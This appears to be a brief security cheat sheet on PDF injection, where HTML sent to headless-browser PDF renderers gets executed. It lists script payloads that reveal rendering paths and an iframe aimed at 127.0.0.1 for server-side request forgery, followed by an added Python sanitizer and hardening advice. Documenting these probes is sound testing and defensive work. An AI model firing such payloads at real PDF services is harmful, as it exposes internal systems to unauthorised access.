
PDF Injection

Concept

To generate a PDF, most libraries render the HTML in a headless browser and use a feature similar to the print function built into most browsers.

[Image: Profile Pic]

So at render time the injected content is executed by a browser that may not have been patched against common vulnerabilities, and that may still expose some JavaScript functions.

[Image: Profile Pic]

Example of payloads

Test for JavaScript injection

<script>document.write('test')</script>

Path extraction

<script>document.write(window.location)</script>

Internal site overview

<iframe src="http://127.0.0.1:8080/" width="500" height="500"></iframe>

If it doesn't work, test with a request to an external website instead, which will confirm that the renderer performs the GET.
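As an added defensive illustration, not code from the original page: a small allowlist sanitizer written here in Python (standard library only, names are my own) that strips script, iframe and every attribute from user-supplied HTML before that HTML is templated into the document handed to the renderer. The three payloads above reduce to empty strings, while harmless inline formatting survives.

```python
from html.parser import HTMLParser
import html

# Constructed example: allowlist sanitizer for user-controlled fields (e.g. a
# profile name) that end up inside HTML rendered to PDF by a headless browser.
# Only a few formatting tags are kept, attributes are always dropped (so no
# on* handlers or javascript: URLs), and any other element is removed together
# with its content, so <script>/<iframe> payloads never reach the renderer.
ALLOWED_TAGS = {"b", "i", "u", "em", "strong", "p", "br", "ul", "ol", "li"}
# HTML void elements have no end tag, so a disallowed one must not open a skip.
VOID_TAGS = {"br", "img", "hr", "input", "meta", "link", "area", "base",
             "col", "embed", "source", "track", "wbr", "param"}


class PdfHtmlSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0  # > 0 while inside a dropped element

    def handle_starttag(self, tag, attrs):
        if tag in ALLOWED_TAGS:
            if self.skip_depth == 0:
                self.out.append(f"<{tag}>")  # attributes are never kept
        elif tag not in VOID_TAGS:
            self.skip_depth += 1  # drop the element and everything inside it

    def handle_startendtag(self, tag, attrs):  # e.g. <br/>
        if tag in ALLOWED_TAGS and self.skip_depth == 0:
            self.out.append(f"<{tag}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS:
            if self.skip_depth == 0 and tag not in VOID_TAGS:
                self.out.append(f"</{tag}>")
        elif self.skip_depth > 0:
            self.skip_depth -= 1

    def handle_data(self, data):
        if self.skip_depth == 0:
            self.out.append(html.escape(data))  # text stays text


def sanitize_for_pdf(user_html: str) -> str:
    """Return an allowlisted, escaped version of user_html for PDF templating."""
    parser = PdfHtmlSanitizer()
    parser.feed(user_html)
    parser.close()
    return "".join(parser.out)
```

Sanitizing the input is only one layer: the rendering browser should also run with JavaScript disabled and without network access to internal addresses, so that an iframe or image pointing at 127.0.0.1 cannot be fetched even if a payload slips through.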

Resources

Good Explanation